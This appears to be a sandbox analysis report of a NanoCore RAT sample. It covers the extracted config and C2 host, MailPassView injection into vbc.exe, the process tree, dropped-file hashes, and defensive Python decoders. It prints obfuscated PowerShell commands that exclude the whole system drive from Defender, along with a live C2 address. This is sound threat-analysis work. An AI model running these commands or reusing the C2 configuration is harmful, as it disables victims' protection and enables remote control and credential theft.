Analysis
max time kernel: 0s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20231222-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/01/2024, 18:16

Static task: static1
Behavioral task: behavioral1
Sample: 80C6039DC12399E3F771632F0A44C4C3.exe
Resource: win7-20231215-en
General
Target: 80C6039DC12399E3F771632F0A44C4C3.exe
Size: 1.6MB
MD5: 80c6039dc12399e3f771632f0a44c4c3
SHA1: f609ba2e8bc0d4b395b83f38a4867fcdb9b6bfdd
SHA256: f6b10c59c9ce33c5c8f6b02c3293fe5d479e59542698c91b15af74bcce50ab8f
SHA512: 83b8fb0f9943c11012a82049d7861a3b7ec9753036de402c82ac433a5235cb95a104dd69b29ed110cd9dfe3b8ab062d916956f6f66864bf79876e926c2c5a6a5
SSDEEP: 49152:2dh0Omwse7edN51glfneOTS9rFJMkn4Rli/Ea:2dcwN25efeIS9rF6k4RQM
Malware Config
Extracted family: nanocore
Version: 1.2.2.0
C2: links-transition.gl.at.ply.gg:41958, 127.0.0.1:41958
Mutex: 973dbaac-5242-4f6a-aaef-307dad24cdde

activate_away_mode: true
backup_connection_host: 127.0.0.1
backup_dns_server: 8.8.4.4
buffer_size: 65535
build_time: 2023-10-14T03:00:38.071092836Z
bypass_user_account_control: true
bypass_user_account_control_data: (empty)
clear_access_control: true
clear_zone_identifier: false
connect_delay: 4000
connection_port: 41958
default_group: Default
enable_debug_mode: true
gc_threshold: 1.048576e+07 (10485760, i.e. 10 MiB)
keep_alive_timeout: 30000
keyboard_logging: false
lan_timeout: 2500
max_packet_size: 1.048576e+07 (10485760, i.e. 10 MiB)
mutex: 973dbaac-5242-4f6a-aaef-307dad24cdde
mutex_timeout: 5000
prevent_system_sleep: false
primary_connection_host: links-transition.gl.at.ply.gg
primary_dns_server: 8.8.8.8
request_elevation: true
restart_delay: 5000
run_delay: 0
run_on_startup: false
set_critical_process: true
timeout_interval: 5000
use_custom_dns_server: false
version: 1.2.2.0
wan_timeout: 8000

Reading the config: 1.2.2.0 is the NanoCore build that leaked publicly and is the one most often seen in the wild. The only real C2 is links-transition.gl.at.ply.gg on TCP 41958; the backup host 127.0.0.1 is a placeholder, and the at.ply.gg suffix is the address form used by playit.gg tunnels, so the operator's actual host sits behind that tunnel service rather than at a directly attributable IP. request_elevation and bypass_user_account_control are both set, so the client will try to elevate, and set_critical_process is on, which means an elevated client marks itself as a critical process and killing it from Task Manager bug-checks the host; stop it from an EDR or kernel context, or clean the disk offline, rather than terminating it blindly. run_on_startup is false, which matches the absence of any persistence signature in this run, and keyboard_logging is false, so the credential theft observed here comes from the MailPassView injection listed under Signatures rather than from the RAT's own keylogger. The mutex GUID doubles as the build identifier and is a usable host-level IOC; the domain, port and mutex together are the network and host indicators to pivot on.
Signatures

NirSoft MailPassView (2 IoCs)
Password recovery tool for various email clients.
  yara_rule  behavioral2/memory/3392-187-0x0000000000400000-0x000000000041B000-memory.dmp  MailPassView
  yara_rule  behavioral2/memory/3392-185-0x0000000000400000-0x000000000041B000-memory.dmp  MailPassView

Nirsoft (2 IoCs)
  yara_rule  behavioral2/memory/3392-187-0x0000000000400000-0x000000000041B000-memory.dmp  Nirsoft
  yara_rule  behavioral2/memory/3392-185-0x0000000000400000-0x000000000041B000-memory.dmp  Nirsoft

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
  Key value queried  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation  by 80C6039DC12399E3F771632F0A44C4C3.exe

Executes dropped EXE (1 IoC)
  PID 4260  shadowscripts fixed.exe

Uses the VBS compiler for execution (1 TTP)
vbc.exe is the Visual Basic .NET command-line compiler shipped with the .NET Framework (here the 32-bit v2.0.50727 copy). microsofts.exe starts it twice with /shtml <file>, the NirSoft switch for writing a tool's results as an HTML report, and PID 3392 is one of those vbc.exe instances: the MailPassView rule hits above are in its memory at 0x400000-0x41B000, so the credential-recovery tool was placed into vbc.exe's address space rather than run from disk.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (3 IoCs)
  PID 1512 (80C6039DC12399E3F771632F0A44C4C3.exe) wrote to memory of PID 4260 (shadowscripts fixed.exe), procid_target 37; recorded three times
Processes (indentation shows parent/child; the command line is shown, with the on-disk image where it differs)

PID 1512  "C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"
          signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    PID 2044  "C:\Users\Admin\AppData\Local\Temp\sanas.scr" /S
        PID 1136  "C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
    PID 3124  "C:\Users\Admin\AppData\Local\Temp\microsofts.exe"
        PID 2896  "c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\bo2ezzp0.hxi"
                  image: \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
        PID 3392  "c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\zx0bpzxl.geg"
                  image: \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
    PID 4260  "C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"
              signatures: Executes dropped EXE
PID 2268  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAeQBqACMAPgA="
          image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944   "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    PID 1996  "C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
PID 672   "C:\Users\Admin\AppData\Local\Temp\Server2223.exe"
PID 3712  C:\Windows\system32\OpenWith.exe -Embedding
PID 4432  C:\Windows\system32\OpenWith.exe -Embedding
PID 3204  "C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"
PID 4280  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGoAcQB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAaQBmACAAZQByAHIAbwByAHMAIABjAG8AbgB0AGEAYwB0ACAAbQBlACAAbQBhAGkAawBrAGkANAAyADAAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHMAbABwACMAPgA="
          image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Notes on the tree. The two powershell.exe instances (PIDs 2268 and 4280) have no recorded parent in this run. Their image is the SysWOW64 copy although the command line names System32: that is what WOW64 file-system redirection produces when a 32-bit process starts powershell.exe, so both were launched by 32-bit code. Each -EncodedCommand argument is base64 over UTF-16LE, the encoding PowerShell requires for that switch, with random <#...#> block comments interleaved between tokens to break naive string matching. PID 2268 decodes to Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the user profile and the entire system drive from Defender scanning; PID 4280 decodes to Add-Type -AssemblyName System.Windows.Forms followed by a [System.Windows.Forms.MessageBox]::Show call with the text 'if errors contact me maikki420', a decoy error dialog. The two vbc.exe children of microsofts.exe (PIDs 2896 and 3392) each receive /shtml <file>, NirSoft's switch for writing a tool's output as an HTML report; PID 3392 is the process whose memory matched the MailPassView rules in the Signatures section.
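The two -EncodedCommand blobs in the process list are worth decoding before anything else, because one of them disables Defender coverage for the whole system drive. The script below is an added example written by the editor, not code from the sandbox report or from the sandbox vendor: ENCODED_COMMANDS holds the two blobs copied verbatim from the process list (PIDs 2268 and 4280), while the comment-stripping regex, the Add-MpPreference check and the function names are the editor's own triage helpers.

```python
"""Decode and triage the -EncodedCommand blobs from the process list.

Added by the editor; not code from the sandbox report. ENCODED_COMMANDS is
copied from the report (PIDs 2268 and 4280); the helpers are the editor's.
"""
import base64
import re

ENCODED_COMMANDS = {
    2268: "PAAjAG4AcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAeQBqACMAPgA=",
    4280: "PAAjAGsAZQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGoAcQB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAaQBmACAAZQByAHIAbwByAHMAIABjAG8AbgB0AGEAYwB0ACAAbQBlACAAbQBhAGkAawBrAGkANAAyADAAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHMAbABwACMAPgA=",
}

# PowerShell block comments <# ... #>. The sample sprinkles random ones
# between tokens so that a plain string match on the decoded script fails.
_BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8. Decoding the bytes
    as UTF-8 gives NUL-interleaved text that no keyword search will hit."""
    return base64.b64decode(blob).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop the <#..#> noise and collapse the whitespace it leaves behind."""
    return " ".join(_BLOCK_COMMENT.sub(" ", script).split())


def defender_exclusions(script: str) -> list:
    """-ExclusionPath arguments of every Add-MpPreference call in the script,
    whether given as one path or as an @( ... ) array."""
    paths = []
    for call in re.finditer(r"Add-MpPreference\b(.*?)(?:;|$)", script, re.IGNORECASE):
        for arg in re.finditer(r"-ExclusionPath\s+(?:@\((.*?)\)|(\S+))",
                               call.group(1), re.IGNORECASE):
            raw = arg.group(1) if arg.group(1) is not None else arg.group(2)
            paths.extend(p.strip().strip("'\"") for p in raw.split(","))
    return paths


def triage(blobs=ENCODED_COMMANDS) -> dict:
    """Map PID -> cleaned script plus any Defender exclusions it adds."""
    out = {}
    for pid, blob in blobs.items():
        script = strip_block_comments(decode_encoded_command(blob))
        out[pid] = {"script": script, "exclusions": defender_exclusions(script)}
    return out


if __name__ == "__main__":
    for pid, info in triage().items():
        print(f"PID {pid}: {info['script']}")
        if info["exclusions"]:
            print(f"  adds Defender exclusions for: {', '.join(info['exclusions'])}")
```

Two details matter in practice: the UTF-16LE decode is mandatory (PowerShell will not accept UTF-8 for this switch, and a grep for Add-MpPreference against the raw bytes finds nothing), and the comments have to be removed before any signature is applied, since `Add-MpPreference <#mpx#> -ExclusionPath` defeats a pattern that expects the cmdlet and its parameter to be adjacent. An exclusion for $env:SystemDrive is effectively a full disable of real-time scanning and should be treated as such when scoring the host.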
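For anyone ingesting these reports in bulk, the flattened process list is the awkward part: each entry is the image path, immediately followed by the quoted command line, a depth marker such as 2⤵, and a PID that is either on the same line or on a later PID: line, with "- <signature>" lines in between. The parser below is an added example written by the editor, not the sandbox's code; SAMPLE is a subset of this report's own process lines in that flattened form, and the regexes, field names and the single-digit depth assumption are the editor's assumptions about the format.

```python
"""Parse a flattened sandbox process list into a parent/child tree.

Added by the editor; not code from the sandbox report. SAMPLE is a subset of
this report's Processes section in the flattened form the page exports. The
regexes and field names are the editor's assumptions about that format.
"""
import re

SAMPLE = r'''
C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Users\Admin\AppData\Local\Temp\sanas.scr"C:\Users\Admin\AppData\Local\Temp\sanas.scr" /S2⤵PID:2044
-
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"3⤵PID:1136
-
C:\Users\Admin\AppData\Local\Temp\microsofts.exe"C:\Users\Admin\AppData\Local\Temp\microsofts.exe"2⤵PID:3124
-
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\bo2ezzp0.hxi"3⤵PID:2896
-
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\zx0bpzxl.geg"3⤵PID:3392
-
C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"2⤵
- Executes dropped EXE
PID:4260
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"1⤵PID:944
-
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"2⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\Server2223.exe"C:\Users\Admin\AppData\Local\Temp\Server2223.exe"1⤵PID:672
'''

# <image><"command line"><depth>⤵[PID:<n>]. Depth is taken as one digit so a
# command line that happens to end in a digit is not swallowed into it.
_PROC = re.compile(r'^(?P<image>[^"]+)(?P<cmd>".*?)(?P<depth>\d)⤵(?:PID:(?P<pid>\d+))?\s*$')
_PID = re.compile(r"^PID:(?P<pid>\d+)")
_TAG = re.compile(r"^- (?P<tag>\S.*)$")


def parse_process_tree(text: str) -> dict:
    """Return {pid: node}; each node carries image, cmd, depth, parent (pid or
    None for a root) and the signature tags the report attached to it."""
    order, stack, pending = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _PROC.match(line)
        if m:
            depth = int(m["depth"])
            del stack[depth - 1:]                       # close deeper branches
            parent = stack[depth - 2] if depth > 1 and len(stack) >= depth - 1 else None
            node = {"pid": int(m["pid"]) if m["pid"] else None,
                    "image": m["image"], "cmd": m["cmd"], "depth": depth,
                    "_parent": parent, "tags": []}
            stack.append(node)
            order.append(node)
            pending = node if node["pid"] is None else None
            continue
        m = _PID.match(line)                             # PID on its own line
        if m and pending is not None:
            pending["pid"] = int(m["pid"])
            pending = None
            continue
        m = _TAG.match(line)                             # "- <signature>" lines
        if m and pending is not None:
            pending["tags"].append(m["tag"])
    nodes = {}
    for node in order:                                   # resolve parents by PID
        parent = node.pop("_parent")
        node["parent"] = parent["pid"] if parent else None
        nodes[node["pid"]] = node
    return nodes


def lineage(nodes: dict, pid: int) -> list:
    """PIDs from the root process down to pid, for answering 'who spawned this'."""
    chain = []
    while pid is not None:
        chain.append(pid)
        pid = nodes[pid]["parent"]
    return chain[::-1]


if __name__ == "__main__":
    tree = parse_process_tree(SAMPLE)
    for pid, node in tree.items():
        print("    " * (node["depth"] - 1) + f"PID {pid}  {node['cmd']}  {node['tags']}")
```

The parent of each entry is the most recent entry one level shallower, which is why the parser keeps a per-depth stack and truncates it whenever a shallower entry appears. With the tree in hand, lineage(tree, 3392) answers the question the Signatures section raises: the vbc.exe instance holding MailPassView descends from the submitted sample via microsofts.exe.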
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 913KB
  MD5: 799c188cf6df366f4c0f98b8800a4977
  SHA1: 161d6006518879ecba6cf45b29599992d8eadfce
  SHA256: 32e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841
  SHA512: 32a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1

Filesize: 893KB
  MD5: bfb9089bf4cd2ee95a235603efb29895
  SHA1: 511ad28599d423f16be8cacf3ce60088fe556f51
  SHA256: b467b658e82b8d57d736a486bdd02fb20d34ab47da7176feae60dff285033c23
  SHA512: df46a060a5ac315969e943ac9b121877ba3a348c2ca8dac34d4fda3ab9bf11bce880bb82761274e88d139f9c8bc8f60c5bae43224833bf50f0414220b4ffc6f0

Filesize: 183KB
  MD5: b9d1be8ae4f4a7a77f309b032a914564
  SHA1: 3b9da974e959adbb0f12705c64fd58e0c8ec5b18
  SHA256: 5f9c9f9af0dc5779d63ea334443d512d675b99c588f2505b652d49d02650c3ba
  SHA512: dfadf27f176fe700df9dd9a979e030d362e906a25815eccb1a40c09d8dfee542a75ababbc361833742891fd5d0358233ad68cac05c12aedca1e5d93ae370fc14

Filesize: 93KB
  MD5: 86757f6c08b6cb698250cc9fc1816a8e
  SHA1: fa8a2fbc982943a031ad202b3e4b1cdb11bcff6a
  SHA256: 98fa9c5139362be3e25333a7c48229ed220cc61c0dc41b8270e66d2886aa7dff
  SHA512: cb87cf73deda4299561af9e7c4d65a82816ca5f82890edd76cfec258dbf973b197cd6c40bca2f8643d39f451072e71c5f9529864689cc68097a4382bec97a7dc

Filesize: 3KB
  MD5: 02524418240369b25b988e9884cd1c54
  SHA1: 42a33322d952edf6d8431d4cd788bbc863d2b890
  SHA256: 80b2a0874c2f734dfe1196d7ae2a7bc6ccb30df2d9281513ac33edc529a71a37
  SHA512: 7c5bbe911f7f0b072d6fdb89ea5759655c2b5cf9ebfddff8f2f67f956141b8ed3697ab0504f60c3992849afbbc79434043a6c04d7cf6ddd958e23354fd3a698f

Filesize: 202KB
  MD5: 5fdd418baf9c0d789e67758ad9f2dd1a
  SHA1: c0be3be193af670cfe01a64aef7c5b0a0b9d091a
  SHA256: 82f59d1a1a65c0651ae7a965bb6481ba1351ea9efc9f9457de372043709e5a47
  SHA512: 9ace7aed4e4db6f2df7a8df22227079acf176cb7b7e90a0d2638dfd44296653fae6194531a7335fb10fd9396f3cd4f11621715b2a2e4f948209055a809b00c50

Filesize: 183KB
  MD5: b7cedaa564e3fb095f94aef59f7ed0da
  SHA1: 3f93a84f2d290840cfb5418e15c47dda39ab967d
  SHA256: 526a5aae8d6af5d4af48bef2bf37f6a79b1584b7b48d32bef6a2f6f4ee69ccfc
  SHA512: 18d274dba047179d7cc6b2bb14ede76618bf5c93d8a4b4d1a32bbcf2f6494c9ecc4a601a5a4eae5d7672967be5c3a0c5bfc402f97626638ba7825d6412538f7d

Filesize: 1.2MB
  MD5: 4c624867a94fee20d81b9e14755165de
  SHA1: 6f5afb06ff6278616f8fb0cd81ad1e164b0fee24
  SHA256: 9a1ef7b5af62c005df90a75846e390e1695ecd18c7727b8e039e4b5842d6f388
  SHA512: 0a40dc67d116b9726c3129a88e82c536273b4ad42f850ca78828b042dc5d20313caf1ee8a8a7136efab6027fa2f7bcf1551fac61f239c10d865f5664a8006064

Filesize: 523B
  MD5: 69b2a2e17e78d24abee9f1de2f04811a
  SHA1: d19c109704e83876ab3527457f9418a7d053aa33
  SHA256: 1b1491f21e64681f8fdc27b2265e2274fb7813eecb6ad8b446d2e431f6300edd
  SHA512: eb7269979bc4187520636fe3d7b3089f2c7c02e81c4ce2a738ade680f72c61c67fe9577eeaa09d3ca93f34b60be8c434d2cfbfed6566e783f6611279f056150f